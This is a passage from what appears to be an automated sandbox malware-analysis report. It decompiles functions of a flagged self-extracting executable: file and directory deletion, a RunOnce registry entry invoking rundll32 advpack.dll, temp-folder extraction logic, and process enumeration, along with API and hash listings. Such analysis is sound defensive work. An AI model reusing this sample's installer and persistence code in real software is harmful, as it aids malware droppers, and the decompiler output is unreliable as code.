								E004016B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0040658A( &_v280, 0x104, 0x401140);
								E00402390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00402398
0x0040239e
0x004023a3
0x004023a5
0x004023ae
0x004023b3
0x004024cb
0x004024d2
0x004024d3
0x004024d4
0x004024df
0x004023c2
0x004023d1
0x004023db
0x004023e4
0x004023f6
0x004023fc
0x00402401
0x00000000
0x00000000
0x00000000
0x00000000
0x00402407
0x00402407
0x00402408
0x00402411
0x0040241f
0x0040247a
0x00402483
0x00402495
0x004024a3
0x00402421
0x0040242f
0x00402453
0x0040245d
0x00402466
0x00402472
0x00402472
0x0040242f
0x004024af
0x004024b5
0x004024be
0x004024c5
0x00000000
0x004024c5

APIs

FindFirstFileA.KERNELBASE(?,00408A3A,004011F4,00408A3A,00000000,?,?), ref: 004023F6
lstrcmpA.KERNEL32(?,004011F8), ref: 00402427
lstrcmpA.KERNEL32(?,004011FC), ref: 0040243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00402495
DeleteFileA.KERNEL32(?), ref: 004024A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 004024AF
FindClose.KERNELBASE(00000000), ref: 004024BE
RemoveDirectoryA.KERNELBASE(00408A3A), ref: 004024C5

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 87459b5c72380a807aff589477aa401463d4fc57f92a57124bb70d4d89d3350e
Instruction ID: 49d887b1e5617c187f2e1a2157473020d0f6751303a448a4b2a9eeaf758e879d
Opcode Fuzzy Hash: 87459b5c72380a807aff589477aa401463d4fc57f92a57124bb70d4d89d3350e
Instruction Fuzzy Hash: E6318131604744ABC320DF64CE8DEEB73ACABC4309F14493FB555A62D0EB7C9909875A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00402BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x40a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x409124 = 0;
				if(E00402CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00402F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E004052B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x408a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x409a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00401F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x408588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x409124; // 0x80070002
				return _t7;
			}

0x00402c03
0x00402c0d
0x00402c18
0x00402c20
0x00402c2e
0x00402c32
0x00402c36
0x00402c3d
0x00402c43
0x00402c45
0x00402c47
0x00402c49
0x00402c4e
0x00402c4e
0x00402c47
0x00402c32
0x00402c20
0x00402c50
0x00402c54
0x00402c57
0x00402c64
0x00402c66
0x00402c6b
0x00402c6d
0x00402c74
0x00402c76
0x00402c7c
0x00402c7e
0x00402c87
0x00402c89
0x00402c89
0x00402c87
0x00402c7c
0x00402c74
0x00402c8e
0x00402c95
0x00402c98
0x00402c98
0x00402c9e
0x00402ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C28
CloseHandle.KERNEL32(00000000,?,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C98

Strings

Kernel32.dll, xrefs: 00402C13
HeapSetInformation, xrefs: 00402C22

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 5bf725c2443ac3e33919fba430f8a36c7d83ff64ff9bd08612ecfe4855b0a2a3
Instruction ID: 373ad44501aeb887ed01a9fdf89c2162dac343eefee69ca1e043016b058be2d5
Opcode Fuzzy Hash: 5bf725c2443ac3e33919fba430f8a36c7d83ff64ff9bd08612ecfe4855b0a2a3
Instruction Fuzzy Hash: 00118C312043166BF7207BA5AF8CA6B37599B88394B04403AB940B72E1DAB8DC418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 067B07C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 067B07EE
Module32First.KERNEL32(00000000,00000224), ref: 067B080E

Memory Dump Source

Source File: 00000000.00000002.392209330.00000000067B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67b0000_d3HccaLUT7.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 074f7a661d5b34ab4a7f7d5edeb5c70bc199e73ff71b2314fd05f70822cd8dd7
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 25F096316007146FD7603BF5AC8DBBFB6ECBF49625F101528E642910C0DBB0E9458A61

Uniqueness

Uniqueness Score: -1.00%

Function 0040202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x408004; // 0x7980a54a
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00406CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0040171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0040658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x409a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x4091e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x4091e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x4091e5);
						if(_t90 != 0) {
							 *0x408580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
							E0040171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E004044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0040658A( &_v268, 0x104, 0x401140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x408530 = _t66;
				goto L23;
			}

0x0040202a
0x00402035
0x0040203c
0x00402041
0x00402050
0x0040205f
0x00402064
0x0040206f
0x0040208c
0x00402094
0x00402257
0x00402266
0x00402266
0x0040209a
0x0040209b
0x0040209d
0x004020aa
0x004020af
0x004020c9
0x004020d1
0x00000000
0x00000000
0x004020d3
0x004020da
0x00000000
0x00000000
0x00000000
0x004020da
0x004020e2
0x00402103
0x0040210e
0x00402116
0x00402122
0x00402128
0x0040212c
0x00402179
0x00402194
0x004021de
0x004021e4
0x00402256
0x00402256
0x00000000
0x00402256
0x00402196
0x00402196
0x0040219c
0x0040219f
0x0040219f
0x004021a1
0x004021a2
0x004021a6
0x004021a8
0x004021b0
0x004021b0
0x004021b2
0x004021b3
0x004021bc
0x004021c7
0x004021cb
0x004021f1
0x004021f6
0x004021fd
0x004021ff
0x004021ff
0x00402204
0x00402213
0x00402218
0x0040221d
0x0040221d
0x00402220
0x00402220
0x00402222
0x00402223
0x00402229
0x0040223d
0x00402249
0x00402250
0x00000000
0x00402250
0x004021d2
0x004021d9
0x00000000
0x004021d9
0x0040213a
0x00402141
0x00402144
0x0040214c
0x00000000
0x00000000
0x00402163
0x00402172
0x00402172
0x00000000
0x00402163
0x004020ea
0x004020f0
0x00000000

APIs

memset.MSVCRT ref: 00402050
memset.MSVCRT ref: 0040205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040208C

Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020EA
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402144
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0040218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0040223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402250

Strings

advpack.dll, xrefs: 00402109
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004021A8, 00402204
wextract_cleanup%d, xrefs: 0040209E
wextract_cleanup0, xrefs: 004020A5, 004020BE, 004020F0, 00402232
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 004021F6
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00402082
%s /D:%s, xrefs: 004021FF, 00402210
DelNodeRunDLL32, xrefs: 0040212E

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-3726664654
Opcode ID: 0bf0e1e7ac6b8ceac50cf57e4c09883d7fb06c483310c7f4308435288bc66475
Instruction ID: abd05bcecfda372187b57d735bcaea41b16cf637c922aa78c443ab609978b97c
Opcode Fuzzy Hash: 0bf0e1e7ac6b8ceac50cf57e4c09883d7fb06c483310c7f4308435288bc66475
Instruction Fuzzy Hash: E1510671A00218ABDB209F60DE4DFEB777CEB44700F0041BAFA49F71D1DAB89D498A58

Uniqueness

Uniqueness Score: -1.00%

Function 004055A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E004055A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x408004; // 0x7980a54a
				_v8 = _t28 ^ _t110;
				_t2 = E0040468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0040468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x409a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x408b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x408a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00406517(_t82, 0x7d2, 0, E00403210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x409a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x4091e4;
									_t40 = GetTempPathA(0x104, 0x4091e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00401781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00406952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0040597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00402630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0040658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x4091e4;
																					E00401781(0x4091e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00405467(0x4091e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00402630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0040597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00405467(0x4091e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x4091e4;
											_t70 = E00402630(0, 0x4091e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x4091e4;
												_t71 = E00405467(0x4091e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0040597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x408b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00405467(0x408b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E004044B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x409124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x409124 = E00406285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00406CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x004055ab
0x004055b2
0x004055c9
0x004055d5
0x004055d9
0x00405600
0x00405605
0x0040560a
0x0040560c
0x00405638
0x00405641
0x00405643
0x00405645
0x00405645
0x0040564c
0x00405652
0x00405657
0x00405659
0x00405696
0x0040569c
0x0040589f
0x004058a7
0x004058ac
0x004058b3
0x004058b5
0x004056a2
0x004056a2
0x004056a8
0x00000000
0x004056ae
0x004056ae
0x004056b9
0x004056bf
0x004056c1
0x004056f3
0x004056f3
0x00405705
0x0040570a
0x00405711
0x00405717
0x00405724
0x00405726
0x00405729
0x00405730
0x00405737
0x0040573d
0x00405740
0x00000000
0x00000000
0x00000000
0x00000000
0x0040572b
0x0040572b
0x0040572e
0x00405742
0x00405742
0x00405745
0x0040576b
0x0040576b
0x00000000
0x00405747
0x00405747
0x0040574d
0x0040574f
0x00405771
0x00405771
0x00405773
0x00000000
0x00405751
0x00405751
0x00405753
0x00000000
0x00405755
0x0040575b
0x00405760
0x00405762
0x00000000
0x00405764
0x00405764
0x00405769
0x0040577e
0x0040577e
0x00405781
0x00405788
0x0040578d
0x0040578f
0x004057b2
0x004057b8
0x004057bd
0x004057bf
0x004057cd
0x004057cd
0x004057dd
0x004057e3
0x004057ef
0x004057f5
0x004057f8
0x0040580a
0x0040580a
0x004057fa
0x00405802
0x00405802
0x0040580d
0x0040580f
0x00405830
0x00405836
0x0040583d
0x0040584b
0x00405851
0x00405855
0x0040585a
0x0040585c
0x00000000
0x0040585e
0x0040585e
0x00000000
0x0040585e
0x00405811
0x00405817
0x00405819
0x0040581f
0x00000000
0x0040581f
0x00405791
0x00405797
0x0040579c
0x0040579e
0x00000000
0x004057a0
0x004057a9
0x004057ae
0x004057b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004057b0
0x0040579e
0x00000000
0x00000000
0x00000000
0x00405769
0x00405762
0x00405753
0x0040574f
0x00000000
0x00000000
0x00000000
0x0040572e
0x00000000
0x00405864
0x00405864
0x00405864
0x00405717
0x00000000
0x004056c3
0x004056c5
0x004056c9
0x004056ce
0x004056d0
0x00000000
0x004056d6
0x004056d6
0x004056d8
0x004056dd
0x004056df
0x00000000
0x004056e1
0x004056e2
0x004056e4
0x004056e6
0x004056eb
0x004056ed
0x00000000
0x004056f3
0x004056f3
0x00000000
0x0040586c
0x00405878
0x0040587e
0x00405882
0x00405883
0x00405889
0x0040588e
0x0040588e
0x00000000
0x00405896
0x004056ed
0x004056df
0x004056d0
0x004056c1
0x004056a8
0x0040565b
0x0040565b
0x0040565d
0x00405669
0x00405669
0x0040565f
0x0040565f
0x00405665
0x00405667
0x00000000
0x00000000
0x00405667
0x0040566c
0x00405673
0x00405678
0x0040567a
0x0040589b
0x0040589b
0x00405680
0x00405685
0x0040568c
0x00000000
0x0040568c
0x0040567a
0x0040560e
0x00405613
0x0040561a
0x00405620
0x00405626
0x00000000
0x00405626
0x004055db
0x004055e0
0x004055e7
0x004055f1
0x004055f6
0x004055f6
0x004055f6
0x004058b7
0x004058c7

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 004055CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00405638
LocalFree.KERNEL32(00000000), ref: 0040564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405620

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 004056B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0040571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00405737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 004057CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 004057EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00405802

Part of subcall function 00402630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00402654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00405830

Part of subcall function 00406517: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
Part of subcall function 00406517: LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
Part of subcall function 00406517: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
Part of subcall function 00406517: FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00405878

Part of subcall function 0040597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004059A8
Part of subcall function 0040597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 004059AF

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004056AE, 004056B3, 0040583D
RUNPROGRAM, xrefs: 004055BD, 00405600
msdownld.tmp, xrefs: 004057D3
Z, xrefs: 0040570A
A:\, xrefs: 004056F4
<None>, xrefs: 00405632

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-2740620654
Opcode ID: 4971864637cee8b0fcbe78389781779da4c8e8b84f5700c2434fd0c7404e9403
Instruction ID: d5c9d26d297622afc2c63048806d0aa51a227b55250bd62e7bce8c8ac459e010
Opcode Fuzzy Hash: 4971864637cee8b0fcbe78389781779da4c8e8b84f5700c2434fd0c7404e9403
Instruction Fuzzy Hash: FE810871A046085ADB20AB319D45BEB726DDB50304F0444BBF986F32D1DF7C8D828E5D

Uniqueness

Uniqueness Score: -1.00%

Function 004044B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

